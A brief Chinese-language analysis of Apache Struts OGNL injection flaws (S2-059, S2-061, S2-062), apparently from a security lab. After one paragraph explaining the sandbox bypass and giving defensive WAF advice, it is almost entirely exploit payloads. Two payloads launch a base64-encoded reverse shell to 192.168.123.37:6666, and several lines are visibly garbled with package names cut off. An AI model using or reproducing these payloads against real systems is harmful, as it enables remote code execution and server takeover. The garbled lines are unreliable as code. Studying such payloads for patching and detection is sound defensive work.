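S2-062漏洞原理分析
下面三组 payload 的思路一致:先通过 OGNL 表达式取得 valueStack 的 context,再清空 excludedClasses 与 excludedPackageNames(或直接替换 memberAccess)以解除 OGNL 沙箱的黑名单限制,最后才调用命令执行。防守方应升级到官方已修复的 Struts 版本,避免对用户可控的标签属性做 %{...} 强制 OGNL 求值,并在请求日志或 WAF 规则中关注参数里出现的 excludedClasses、excludedPackageNames、memberAccess、org.apache.tomcat.InstanceManager、freemarker.template.utility.Execute 等字符串。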
>>>> S2-059
payload1=%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance( .opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}
payload2=%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess( .OgnlContext )).( .lang.Runtime ().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyMy4zNy82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}'))}
>>>> S2-061
payload=%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("whoami")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
>>>> S2-062
payload=(#request.map=#BeanMap@{}).toString().substring(0,0) + .apache.commons.collections.
(#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +
(#request.map2=#BeanMap@{}).toString().substring(0,0) + .apache.commons.collections.
(#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +
(#request.map3=#BeanMap@{}).toString().substring(0,0) + .apache.commons.collections.
(#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +
(#request.get('map3').put('excludedPackageNames',# .apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +
(#request.get('map3').put('excludedClasses',# .apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +
(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyMy4zNy82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}'}))
银河实验室